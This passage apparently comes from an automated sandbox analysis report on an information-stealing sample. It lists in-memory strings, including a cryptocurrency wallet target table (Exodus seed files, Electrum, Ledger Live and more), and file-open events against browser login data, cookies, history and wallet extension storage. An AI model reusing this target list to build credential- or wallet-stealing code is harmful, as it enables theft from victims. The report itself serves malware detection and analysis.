Source: file.exe, 00000000.00000002.2213992001.0000000000EE4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Jaxx Desktop (old)
Source: file.exe, 00000000.00000002.2213992001.0000000000EE4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: exodus.conf.json
Source: file.exe, 00000000.00000002.2213992001.0000000000EE4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Exodus\
Source: file.exe, 00000000.00000002.2213992001.0000000000EE4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: info.seco
Source: file.exe, 00000000.00000002.2213992001.0000000000EE4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: ElectrumLTC
Source: file.exe, 00000000.00000002.2213992001.0000000000EE4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: passphrase.json
Source: file.exe, 00000000.00000002.2213992001.0000000000EE4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \jaxx\Local Storage\
Source: file.exe, 00000000.00000002.2215093487.00000000019CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2213992001.0000000000EE4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Exodus
Source: file.exe, 00000000.00000002.2213992001.0000000000EE4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: file__0.localstorage
Source: file.exe, 00000000.00000002.2215093487.00000000019CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2213992001.0000000000F15000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe, 00000000.00000002.2213992001.0000000000EE4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2213992001.0000000000EE4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: MultiDoge
Source: file.exe, 00000000.00000002.2213992001.0000000000EE4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: seed.seco
Source: file.exe, 00000000.00000002.2213992001.0000000000EE4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: keystore
Source: file.exe, 00000000.00000002.2213992001.0000000000EE4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
